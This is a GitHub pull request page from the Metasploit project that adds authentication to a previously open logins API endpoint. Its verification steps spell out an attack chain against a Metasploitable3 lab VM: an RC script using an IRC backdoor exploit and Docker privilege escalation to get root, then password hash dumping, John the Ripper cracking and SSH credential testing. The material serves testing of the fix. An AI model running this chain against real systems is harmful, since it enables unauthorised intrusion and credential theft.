Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix to add LoginServlet authentication #11183

Merged
merged 2 commits into from
Jan 7, 2019
Merged

Fix to add LoginServlet authentication #11183

merged 2 commits into from
Jan 7, 2019

Conversation

mkienow-r7
Copy link
Contributor

@mkienow-r7 mkienow-r7 commented Dec 28, 2018
edited by jbarnett-r7
Loading

The LoginServlet currently does not require authentication. This fix adds authentication to the LoginServlet endpoints introduced in #10176.

Get hosts or other models without authentication and note the error message:

$ curl -k -X GET -H "accept: application/json" "https://localhost:8080/api/v1/hosts" | python -m json.tool
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100    72  100    72    0     0   4500      0 --:--:-- --:--:-- --:--:--  4800
{
    "error": {
        "code": 401,
        "message": "Authenticate to access this resource."
    }
}

Get logins without authentication and a response is returned rather than an authentication error:
Note, the response is empty because there are no logins in the database.

$ curl -k -X GET -H "accept: application/json" "https://localhost:8080/api/v1/logins" | python -m json.tool
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100     2  100     2    0     0    142      0 --:--:-- --:--:-- --:--:--   142
[]

Ticket: MS-3699

Verification

Note, the verification steps are mostly duplicated from #10176.

Test login modules

The following steps will create and update login records.

  • Set up Metasploitable3 VM for testing
  • Start msfconsole
  • Create one or more valid credentials for Metasploitable3, for example, creds add user:vagrant password:vagrant
  • Test a successful login against a service
    • use auxiliary/scanner/ssh/ssh_login
    • set RHOSTS <IP address of Metasploitable3>
    • set DB_ALL_CREDS true to use the credential pairs stored in the database. Ensure valid credentials are displayed when running the creds command.
    • run
    • Verify the login attempt is displayed for the credential by running the creds command.
  • Test that logins are updated properly
    • use auxiliary/scanner/ssh/ssh_login
    • set RHOSTS <IP address of Metasploitable3>
    • set DB_ALL_CREDS true to use the credential pairs stored in the database. Ensure invalid credentials are displayed when running the creds command.
    • run
    • Verify the login attempt is displayed for the credential by running the creds command.
    • Turn off Metasploitable3 and run the module again to get a failed attempt.
    • Verify the login attempt displays for the credential. You may need to use the API for this because it is not displayed in the UI. I recommend using the GET command under Logins at http://localhost:8080/api/v1/api-docs. The login record should show a status of Unable to connect

Test JTR modules

The following steps will create and update login records.

  • Create the following RC script:
use exploit/unix/irc/unreal_ircd_3281_backdoor
set RHOST <IP address of Metasploitable3>
set RPORT 6697
exploit -z
sleep 5
sessions -u 1
sleep 5
use exploit/linux/local/docker_daemon_privilege_escalation
set SESSION 2
set LHOST <IP of listening address>
set LPORT 4445
exploit
  • Set up Metasploitable3 VM for testing
  • Start msfconsole
  • Run the RC script resource <RC Script Name>.rc
  • Verify you get a root shell and then background it
  • Gather Dump Password Hashes
    • use post/linux/gather/hashdump
    • set SESSION <root session ID>
    • run
  • Crack the hashes using John the Ripper Linux Password Cracker
    • use auxiliary/analyze/jtr_linux
    • Create a custom wordlist with at least Pr0t0c07
    • set CUSTOM_WORDLIST <wordlist file name>
    • set USE_DEFAULT_WORDLIST false
    • set USE_ROOT_WORDS false
    • run - this should successfully crack the c_three_pio hash
  • Verify the cracked creds are present when you run the creds command
  • Test successful logins against a service using the newly cracked creds
    • use auxiliary/scanner/ssh/ssh_login
    • set RHOSTS <IP address of Metasploitable3>
    • set DB_ALL_CREDS true to use the credential pairs stored in the database.
    • run
    • Verify the login attempts are displayed for the credentials by running the creds command.

Verify the content in the API docs

  • Verify unauthenticated access to the Logins endpoints using the Swagger UI respond appropriately
  • Verify the Logins endpoints using the Swagger UI to ensure they are working correctly

@jbarnett-r7 jbarnett-r7 self-assigned this Jan 7, 2019
@jbarnett-r7 jbarnett-r7 merged commit 66d0ffd into rapid7:master Jan 7, 2019
jbarnett-r7 added a commit that referenced this pull request Jan 7, 2019
@jbarnett-r7
Land #11183, add authentication to LoginServlet endpoints
f23142c
@mkienow-r7 mkienow-r7 deleted the MS-3699-add-login-servlet-authentication branch January 7, 2019 23:24
@jbarnett-r7
Copy link
Contributor

Release Notes

Require authentication when accessing the /api/v1/logins endpoint.

This pull request was closed.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@jbarnett-r7 jbarnett-r7

Labels
bug msf5
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@mkienow-r7 @jbarnett-r7